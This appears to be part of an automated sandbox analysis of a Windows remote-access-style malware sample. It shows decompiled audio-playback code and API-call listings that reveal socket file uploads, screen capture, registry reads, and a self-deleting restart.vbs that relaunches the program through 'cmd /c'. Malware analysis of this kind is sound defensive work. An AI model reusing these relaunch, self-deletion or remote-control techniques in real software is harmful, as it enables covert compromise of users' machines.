                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_a24, _t30);
                                        					E00412E4E(_t30);
                                        					_t91 = _t91 - 0x10 + 0x14;
                                        					L4:
                                        					_t35 =  &_v68;
                                        					L0041416A();
                                        					_t36 =  &_v52;
                                        					L00414146();
                                        					_t37 =  &_v36;
                                        					L0041414C();
                                        					_t38 =  &_v20;
                                        					L00414146();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t38, _t37, _t37, _t36, _t36, _t35, _t35, L"open \"",  &_a4, L"\" type ", E00412795( &_v84, _a20), L" alias audio");
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					mciSendStringW(_t38, 0, 0, 0);
                                        					mciSendStringA("play audio", 0, 0, 0);
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                        					E004020C2(0x41c178, 0xa9, 0x415664);
                                        					_t43 = CreateEventA(0, 1, 0, 0);
                                        					 *0x41c1d4 = _t43;
                                        					if(_t43 != 0) {
                                        						do {
                                        							if( *0x41c1d2 != 0) {
                                        								mciSendStringA("pause audio", 0, 0, 0);
                                        								 *0x41c1d2 = 0;
                                        							}
                                        							if( *0x41c1d3 != 0) {
                                        								mciSendStringA("resume audio", 0, 0, 0);
                                        								 *0x41c1d3 = 0;
                                        							}
                                        							mciSendStringA("status audio mode",  &_v88, 0x14, 0);
                                        							_t50 = "stopped";
                                        							_t88 =  &_v88;
                                        							while(1) {
                                        								_t86 =  *_t88;
                                        								_t78 = _t86;
                                        								if(_t86 !=  *_t50) {
                                        									break;
                                        								}
                                        								if(_t78 == 0) {
                                        									L14:
                                        									_t50 = 0;
                                        								} else {
                                        									_t87 =  *((intOrPtr*)(_t88 + 1));
                                        									_t79 = _t87;
                                        									if(_t87 !=  *((intOrPtr*)(_t50 + 1))) {
                                        										break;
                                        									} else {
                                        										_t88 = _t88 + 2;
                                        										_t50 = _t50 + 2;
                                        										if(_t79 != 0) {
                                        											continue;
                                        										} else {
                                        											goto L14;
                                        										}
                                        									}
                                        								}
                                        								goto L18;
                                        							}
                                        							asm("sbb eax, eax");
                                        							asm("sbb eax, 0xffffffff");
                                        							L18:
                                        							if(_t50 == 0) {
                                        								SetEvent( *0x41c1d4);
                                        							}
                                        							if(WaitForSingleObject( *0x41c1d4, 0x1f4) == 0) {
                                        								CloseHandle( *0x41c1d4);
                                        								 *0x41c1d4 = 0;
                                        							}
                                        						} while ( *0x41c1d4 != 0);
                                        					}
                                        					mciSendStringA("stop audio", 0, 0, 0);
                                        					mciSendStringA("close audio", 0, 0, 0);
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                        					_t47 = E004020C2(0x41c178, 0xaa, 0x415664);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t47;
                                        			}

                                        APIs
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,00000000,?,0041B310), ref: 00411D9B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DAE
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0041B310), ref: 00411DC7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0041B310), ref: 00411DD0
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0041B310), ref: 00411DD9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DEA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411DF9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,open ",?," type ,00000000, alias audio,?,0041B310), ref: 00411E2D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,0041B310), ref: 00411E3A
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310), ref: 00411E47
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310), ref: 00411E54
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E5F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E68
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E71
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E7A
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E86
                                        • mciSendStringW.WINMM(00000000), ref: 00411E8D
                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00411EA1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411EB1
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 00411ECB
                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00411EEE
                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00411F06
                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00411F1A
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411F46
                                        • PathFileExistsW.SHLWAPI(00000000,?,0041B310), ref: 00411F4D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411F69
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411F92
                                        • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FA3
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FB3
                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00411FD3
                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00411FDD
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411FED
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(000000AA), ref: 00412005
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041200E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@SendString$??0?$basic_string@D@2@@std@@D@std@@$?c_str@?$basic_string@G@2@@0@Hstd@@V?$basic_string@$D@1@@$EventV01@@V10@$??4?$basic_string@?find@?$basic_string@?length@?$basic_string@CloseCreateExistsFileG@1@@HandleObjectPathSingleV01@V10@0@V10@@Wait
                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                        • API String ID: 1753768752-1354618412
                                        • Opcode ID: 9b6a564b4307e82e3d21cd783dbd3716fbb2968f83690b74f9bece41395da60c
                                        • Instruction ID: 390487820da651bbbca776db698e462f264097bfb23042b57de684319bca0ea3
                                        • Opcode Fuzzy Hash: 9b6a564b4307e82e3d21cd783dbd3716fbb2968f83690b74f9bece41395da60c
                                        • Instruction Fuzzy Hash: E1618271A9061CFFDB00AFA0DC89DFF3B6DEB54344B448026F902971A1DB799D848B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                        • recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                        • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035BB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035CD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004035DE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,FileSize: ,00000000,?,?,?,?), ref: 004035FB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,FileSize: ,00000000,?,?,?,?), ref: 00403608
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403619
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040362A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403633
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004036F3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,0000FDE8,00000000), ref: 004036FE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403707
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(File Upload: unexpected disconnection,?), ref: 0040371F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?), ref: 0040372F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$Hstd@@$V01@V10@@$??4?$basic_string@?c_str@?$basic_string@V01@@V10@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?size@?$basic_string@LocalTimeV10@0@V12@Y?$basic_string@printfrecv
                                        • String ID: File Upload: unexpected disconnection$FileSize: $[DEBUG]$[INFO]$nTotBytesRecv:
                                        • API String ID: 2510920776-3166941866
                                        • Opcode ID: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                        • Instruction ID: 46474c331338e0ade551c9c3ffb0e9ad5c3b9d5b5a2bd20438cea0ecd9357ef1
                                        • Opcode Fuzzy Hash: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                        • Instruction Fuzzy Hash: 6D810B7290050DEBCB05EF90DC999EEBB7CEF54356F00406AF516A31A0DB749A85CFA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004089BD
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004089C6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 004089E4
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408A07
                                        • _wgetenv.MSVCRT ref: 00408A1B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408A26
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A31
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408A3C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408A49
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 00408A60
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 00408A7A
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A85
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00408A92
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A9F
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408AAB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AB4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ABD
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AC6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ACF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AD8
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 00408AE6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408AF0
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408AFA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408B06
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408B24
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408B31
                                        • exit.MSVCRT ref: 00408B3D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B46
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B4F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                        • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$\restart.vbs$exepath$open
                                        • API String ID: 864010295-1332127163
                                        • Opcode ID: fdb235b3156a944fcdf0f357b1bacb348dd9f07b2e45685e2f1c661ce8b7afb5
                                        • Instruction ID: 8251d2866ff4eed12a0f1102d9a403ddb7336c21f91015765539e7c592c0bf1e
                                        • Opcode Fuzzy Hash: fdb235b3156a944fcdf0f357b1bacb348dd9f07b2e45685e2f1c661ce8b7afb5
                                        • Instruction Fuzzy Hash: 25413D7280050DEBCB00EBA0ED49DEE777CEF98345B54407AF516E3091EB795A09CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                          • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                          • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F676
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F680
                                        • SHCreateMemStream.SHLWAPI(00000000), ref: 0040F687
                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,00000000), ref: 0040F6D4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F70C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F72F
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F755
                                        • _itoa.MSVCRT ref: 0040F75C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                          • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                          • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                          • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                          • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                          • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                          • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                          • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                          • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,Function_0001B310,?,Function_0001B310,0041C0C8,Function_0001B310,00000000,00000000,?,?,?,0041BF08), ref: 0040F7EF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,0041BF08), ref: 0040F7FF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,0041BF08), ref: 0040F80F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F81F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F82C
